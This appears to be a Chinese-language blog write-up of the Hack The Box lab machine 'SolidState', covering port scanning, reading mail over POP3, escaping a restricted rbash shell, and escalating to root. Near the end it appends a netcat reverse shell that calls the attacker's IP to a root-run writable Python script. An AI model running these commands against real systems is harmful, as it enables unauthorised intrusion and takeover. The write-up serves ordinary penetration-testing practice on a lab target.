HTB 学习笔记

【Hack The Box】linux练习-- SolidState

🔥系列专栏：Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年11月9日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

信息收集

22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 770084f578b9c7d354cf712e0d526d8b (RSA)
|   256 78b83af660190691f553921d3f48ed53 (ECDSA)
|_  256 e445e9ed074d7369435a12709dc4af76 (ED25519)
25/tcp  open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open  pop3?
119/tcp open  nntp?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

web枚举

只有这一个邮箱有点价值

webadmin@solid-state-security.com

pop3枚举

发现有james
我做过，在我的笔记中找到
重置mindy密码

pop3

telnet [ip] 110
list
retr 1
retr 2
再获得两个重要信息
James
mailadmin

还有一个ssh账号密码

rbash绕过

发现是rbash可以-t 执行命令
这两种都可以，我都试了

ssh mindy@10.129.12.180 -t "bash --noprofile"

python -c 'import pty;pty.spawn("/bin/bash");'

在我使用linpeas.sh枚举的时间里，我也同时找了一下可读写的文件

find / -perm 777 -type f 2>/dev/null

去看了一下，是root运行的，我们直接写一个反弹shell 即可

然后等着就行

echo "os.system('/bin/nc -e /bin/bash 10.10.15.82 8001')" >> tmp.py